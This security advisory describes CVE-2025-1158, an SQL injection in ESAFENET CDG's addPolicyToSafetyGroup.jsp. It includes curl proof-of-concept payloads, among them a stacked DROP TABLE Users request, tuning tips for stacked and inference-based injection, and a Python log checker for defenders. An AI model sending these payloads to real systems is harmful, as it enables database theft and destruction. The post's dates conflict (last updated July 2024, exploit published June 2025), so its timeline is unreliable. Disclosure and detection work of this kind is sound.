CVE-2025-1158 - Critical SQL Injection Vulnerability in ESAFENET CDG 5.6.3.154.205_20250114 ([addPolicyToSafetyGroup.jsp] Exploit Details)
*Last updated: July 2024*
*Severity: Critical (CVSSv3.1: 9.8)*
Overview
A severe vulnerability, CVE-2025-1158, has been discovered in the ESAFENET CDG platform, specifically in version 5.6.3.154.205_20250114. This vulnerability stems from insufficient input validation in the addPolicyToSafetyGroup.jsp file, particularly through the safetyGroupId parameter. Exploiting this flaw allows remote attackers to perform SQL injection attacks, potentially leading to complete database compromise.
What Is ESAFENET CDG?
ESAFENET CDG is a safety and compliance management software suite commonly used by enterprises for complex policy enforcement and group management. Its broad deployment in sensitive industries makes such vulnerabilities extremely impactful.
Vulnerable Parameter: safetyGroupId
- Attack Vector: Remote / Network
- Impact: Full database access, data leakage, modification, and potential command execution.
The issue is that the safetyGroupId argument in addPolicyToSafetyGroup.jsp is not sanitized before being concatenated into a SQL statement. Malicious input can thus change the logic of the query.
The vendor's source is not public; the following snippet reconstructs the likely pattern and is illustrative rather than ESAFENET's code:
```jsp
<%@ page import="java.sql.*" %>
<%
String safetyGroupId = request.getParameter("safetyGroupId");
String policyId = request.getParameter("policyId");
Connection conn = ... // Connect to DB
// Both request parameters are pasted straight into the SQL text.
String query = "INSERT INTO PolicyGroups (safetyGroupId, policyId) VALUES ("
    + safetyGroupId + ", " + policyId + ")";
Statement stmt = conn.createStatement(); // plain Statement, no placeholders
stmt.executeUpdate(query);
%>
```
What's wrong here?
User input (safetyGroupId, and policyId alike) is concatenated directly into the SQL statement with no validation and no PreparedStatement, so whatever the client places in the parameter becomes part of the query text.
Proof-of-Concept (PoC) Exploit
An attacker can exploit the vulnerability by sending a crafted HTTP request to the vulnerable endpoint.
Exploit example via curl
```bash
curl "http://TARGET_HOST/addPolicyToSafetyGroup.jsp?safetyGroupId=1%20OR%201=1--&policyId=2"
```
What Happens:
The backend query would become
```sql
INSERT INTO PolicyGroups (safetyGroupId, policyId) VALUES (1 OR 1=1--, 2)
```
Two caveats for anyone testing this. First, a tautology inside an INSERT bypasses no logic: `1 OR 1=1` simply evaluates to 1 and that is the value stored, so this payload only confirms that the parameter reaches the SQL text unquoted. Second, the `--` comments out everything after it, including the closing parenthesis, so the statement as shown is incomplete and fails; on MySQL `--` is not even a comment unless whitespace follows it, so send `--+` or `--%20` (or `%23`) rather than a bare `--`. The difference between an error page and a normal response is itself the signal that the injection point exists.
Stacked queries (only where the driver accepts more than one statement per request):
```bash
curl "http://TARGET_HOST/addPolicyToSafetyGroup.jsp?safetyGroupId=1,2);SELECT+user(),database();--+&policyId=2"
```
```bash
curl "http://TARGET_HOST/addPolicyToSafetyGroup.jsp?safetyGroupId=1,2);DROP+TABLE+Users;--+&policyId=2"
```
Both requests depend on the backend accepting stacked statements: with MySQL Connector/J that requires allowMultiQueries=true, which is off by default, and without it the server rejects the whole string as a syntax error. Two details make the payloads valid where stacking is allowed: the INSERT names two columns, so the injected text has to close the VALUES list with two values (`1,2)`) before the `;`, and MySQL only treats `--` as a comment when whitespace follows it, which is why a `+` (a URL-encoded space) is appended. Note also that the result set of the stacked SELECT is never written to the HTTP response; reading data back through an INSERT-only sink in practice means nesting a subquery inside the VALUES list, or error-based or time-based inference. A destructive statement such as the DROP needs no output at all, which is what makes this endpoint dangerous even without data exfiltration.
Impact
- Full database compromise: the attacker may read, modify, or delete sensitive information.
- Privilege escalation: gain administrative access to the application or, if the database account allows it, execute commands on the database host.
Disclosure status
- Exploit published: June 2025
- Vendor response: none, despite multiple contact attempts to ESAFENET.
- Patch: no official fix is available as of this writing.
- Workaround: until the vendor ships a fix, restrict network access to the CDG server to the hosts that need it, put the endpoint behind a web application firewall, and run the application's database account with the least privilege it needs (no DDL such as DROP, no file or OS-level privileges), so that a successful injection cannot drop tables or reach the host. For the WAF, a positive rule that rejects any safetyGroupId or policyId value that is not a plain integer is more robust than a blacklist of SQL keywords.
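The workaround rests on spotting requests whose numeric parameters are not numeric. The following is an added example, not part of the original post and not vendor code: a small Python checker that scans access-log lines in Apache "combined" format (an assumption about the log format) and flags requests to addPolicyToSafetyGroup.jsp whose safetyGroupId or policyId, after URL decoding, is anything other than a plain integer. The endpoint path and parameter names come from this post; the log lines are constructed for the demonstration.

```python
"""Access-log check for non-numeric parameters sent to addPolicyToSafetyGroup.jsp.

Added example, not ESAFENET code. Endpoint and parameter names come from
the advisory; the log lines below are constructed for the demonstration.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" request line (assumed log format); only needed fields captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
ENDPOINT = "/addpolicytosafetygroup.jsp"
WATCHED = {"safetygroupid", "policyid"}
PLAIN_INT = re.compile(r"\d{1,10}")

# Constructed sample lines: a benign request, the two PoC payloads URL-encoded
# as a client would send them, an unrelated endpoint, and a line that does
# not parse at all.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2025:22:15:37 +0000] "GET /addPolicyToSafetyGroup.jsp?safetyGroupId=7&policyId=2 HTTP/1.1" 200 312',
    '198.51.100.9 - - [10/Feb/2025:22:16:01 +0000] "GET /addPolicyToSafetyGroup.jsp?safetyGroupId=1%20OR%201=1--&policyId=2 HTTP/1.1" 500 188',
    '198.51.100.9 - - [10/Feb/2025:22:16:04 +0000] "GET /addPolicyToSafetyGroup.jsp?safetyGroupId=1%2C2)%3BDROP+TABLE+Users%3B--&policyId=2 HTTP/1.1" 200 312',
    '203.0.113.5 - - [10/Feb/2025:22:17:10 +0000] "GET /login.jsp?user=1%20OR%201=1-- HTTP/1.1" 200 2048',
    "garbage line that is not an access-log entry",
]


def suspicious_params(target: str) -> list:
    """Return (name, decoded value) pairs on the vulnerable endpoint that are not plain integers."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(ENDPOINT):
        return []  # other paths are out of scope for this check
    flagged = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.lower() not in WATCHED:
            continue
        for value in values:  # a repeated parameter yields several values
            if not PLAIN_INT.fullmatch(value):
                flagged.append((name, value))
    return flagged


def scan(lines) -> list:
    """Parse each line; collect client IP, timestamp, status and flagged params per hit."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log entry; skip rather than crash
        flagged = suspicious_params(m["target"])
        if flagged:
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "status": int(m["status"]), "params": flagged})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["ts"], hit["status"], hit["params"])
```

Two limits worth stating: access logs carry only the query string, so parameters sent in a POST body need the same rule applied in the WAF or in request logging, and a 500 status next to a flagged value (as on the second sample line) is a stronger signal than the value alone, since the broken tautology payload produces exactly that. The positive check (digits only) is the same rule a WAF should enforce; it catches encodings and keyword variations that a signature list would miss.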
References
- CVE-2025-1158 on NIST NVD (when published)
- SQL Injection Explanation by OWASP
- Related issues in ESAFENET products on Exploit-DB
Conclusion
CVE-2025-1158 highlights the persistent danger of SQL injection and the vital need for secure coding practices. If you use ESAFENET CDG, check your version and secure your installations immediately. Pressure on the vendor for a fix is urgently needed, given the lack of official response.
Timeline
Published on: 02/10/2025 22:15:37 UTC